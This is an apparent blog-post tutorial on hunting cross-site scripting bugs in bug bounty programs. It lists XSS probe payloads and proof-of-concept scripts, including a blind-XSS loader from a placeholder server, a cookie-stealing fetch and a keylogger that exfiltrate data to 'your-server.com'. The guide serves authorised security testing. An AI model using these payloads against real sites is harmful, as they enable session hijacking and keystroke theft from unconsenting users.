Finding XSS on a Real-World Bug Bounty Program

A Bug Bounty Hunter's Short Guide

Ibtissam hammadi

~3 min read · October 10, 2025 (Updated: October 10, 2025) · Free: No

XSS isn't just a vulnerability; it's a gold mine for ethical hackers. Ranked as a top critical web security risk, finding XSS in bug bounty programs can be highly profitable . I've personally found and reported XSS flaws that turned into four-figure bounties.

Let's cut to the chase and look at the code that finds these bugs.

The XSS Hunter's Toolkit: Essential Test Payloads

Forget just <script>alert(1)</script>. While it's a classic, modern hunting requires a more nuanced arsenal. Start with these probes to see how a site handles your input.

1. Basic Probe & Classic Alert:

"><xss>

This simple payload helps you see if you can break out of an HTML attribute.

2. The Image Tag Onerror Event:

"><img src=x onerror=alert(document.domain)>

This is a fantastic alternative if <script> tags are blocked. It tries to load an invalid image (src=x), which triggers the onerror event, executing our JavaScript.

3. SVG Payload:

"><svg onload=alert(1)>

SVG tags are legitimate web code and sometimes bypass filters that block standard HTML tags.

4. Blind XSS Callback:

For hidden attack surfaces like admin panels, you need a callback to your server.

"><script src=http://your-xss-server.com/collect.js></script>

Tools like XSS Hunter are perfect for catching these callbacks, proving the script executed, often in a high-privilege context .

My Simple 3-Step Hunting Methodology

Step 1: Find Every Injection Point

Don't just test search bars and comment forms. Think bigger:

URL parameters (?query=test)
HTTP Headers (User-Agent, Referer)
Hidden API endpoints found in JavaScript files
Form fields everywhere (user profiles, support tickets, checkout pages)

Step 2: Test with Context-Aware Payloads

Your payload must match where your input is injected. A one-size-fits-all approach fails.

In an HTML Attribute? Break out of it.

"><script>alert(1)</script>

Inside a JavaScript String? Break out and execute code.

'; alert(1);//

In a URL? Try to close the existing tag and add a new event.

"></a><img src=x onerror=alert(1)>

Step 3: Craft a Proof of Concept (PoC) That Gets Paid

A simple alert(1) might not convince a security team. Show real impact to get that bounty.

PoC for Session Hijacking:

<script>
fetch('https://your-server.com/steal?cookie=' + btoa(document.cookie))
</script>

This sends the victim's session cookie to your server .

PoC for Keylogging:

<script>
document.addEventListener('keypress', function(e) {
  fetch('https://your-server.com/log?key=' + e.key);
});
</script>

This logs and exfiltrates every key pressed by the user.

Pro Tip: The Blind XSS Patient Payoff

The most lucrative finds are often Blind XSS. Inject your callback payload into every possible text input (user profiles, support tickets, feedback forms) and wait. It might take days, but when an admin views that data, your payload will fire from their privileged session, leading to a high-value bounty .

Final Thought

Finding XSS is a skill honed through practice. Use these code snippets as your starting point, be patient, and always test ethically. The next critical vulnerability is waiting for you to discover it.

Happy Hunting!